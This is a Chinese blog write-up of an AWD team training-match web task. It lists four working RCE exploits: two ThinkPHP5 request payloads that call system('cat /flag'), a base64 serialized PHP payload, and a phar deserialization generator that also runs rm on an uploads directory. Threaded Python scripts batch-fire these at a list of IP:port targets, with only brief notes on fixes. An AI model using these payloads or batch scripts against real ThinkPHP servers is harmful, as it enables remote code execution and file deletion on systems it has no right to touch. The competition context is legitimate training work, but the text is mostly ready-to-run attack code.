admin 管理员组

文章数量: 887007

web1

这个题目我一共找到了四个漏洞。

Thinkphp5rce1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

这个可以直接打,修复方案如下

App.php的第375行加入一个正则的过滤,即可修复,这个是官方的方法,因为thinkphp我比较熟悉所以就直接按照官方的方法修复了。

thinkphp5rce2
s=cat /flag&_method=__construct&method=&filter[]=system

这个是通过post方法进行传值,没有找到官方的修复方案,但事实上上面那个修了以后这个也就修掉了,为了保险起见我还是做了个双保险。在Request.php里面粗暴的修复了一下

反序列化1

链子还是很简单的,甚至没有链子,直接可以利用,就在入口文件index.php

然后这里简单的反序列化点在Index.php

修复方案,我是直接加了个正则进行替换,把所有字母替换成空,这里就没用了。但想想,这种方法还不如直接把代码删了。

批量利用脚本

import requestsimport refrom lxml import etreeimport timeimport threadingiptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data):    reg = "flag{(.*?)}"    tmp = re.findall(reg, data)    result = []    for i in tmp:        i = 'flag{'+i+'}'        return idef ip_log(flag):    f = open('flag1.txt', 'a')    f.write(flag + "\n")    f.close()def attack(ip):    url2 = "http://" + ip + "/?s=index/index/unse&a=Tzo0OiJDb3JlIjoxOntzOjQ6ImRhdGEiO3M6MjA6InN5c3RlbSgnY2F0IC9mbGFnJyk7Ijt9"    response = requests.get(url2)    flag = find_flag(response.text)    ip_log(flag)    print(ip, ":", flag)for ip in iptables:    t = threading.Thread(target=attack, args=(ip, ))    t.start()
phar反序列化

这里有个上传功能,还有个文件读取功能,用脚趾头想想就知道是phar反序列化

修复方案我直接加了个过滤,把phar协议给过滤掉了。

phar脚本

phpclass Core{
        public $data;    public function __construct(){
            $this->data="system('cat /flag;rm rm /var/www/html/public/uploads/20200314/*');";    }}$obj = new Core();@unlink("yds.phar");$phar = new Phar("yds.phar");$phar->startBuffering();$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");$phar->setMetadata(new Core());$phar->addFromString("yds.txt", "yds_is_so_beautiful");$phar->stopBuffering();rename('yds.phar', 'yds.gif');

批量脚本

import requestsimport refrom lxml import etreeimport timeimport threadingfrom requests import sessioniptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data):    reg = "flag{(.*?)}"    tmp = re.findall(reg, data)    result = []    for i in tmp:        i = 'flag{'+i+'}'        return idef ip_log(flag):    f = open('flag1.txt', 'a')    f.write(flag + "\n")    f.close()def attack(ip):    url1 = "http://"+ip+"/index.php/Index/index/upload"    files = {
    'image': open('yds.gif', 'rb')}    s = session()    response = s.post(url1, files=files)    url2 = "http://"+ip+"/?file=phar://uploads/" + response.text.split('.gif')[0] + '.gif'    response2 = s.get(url2)    flag = find_flag(response2.text)    ip_log(flag)    print(ip, ":", flag)for ip in iptables:    t = threading.Thread(target=attack, args=(ip, ))    t.start()

本文标签: 批量 脚本 团队 训练赛 awd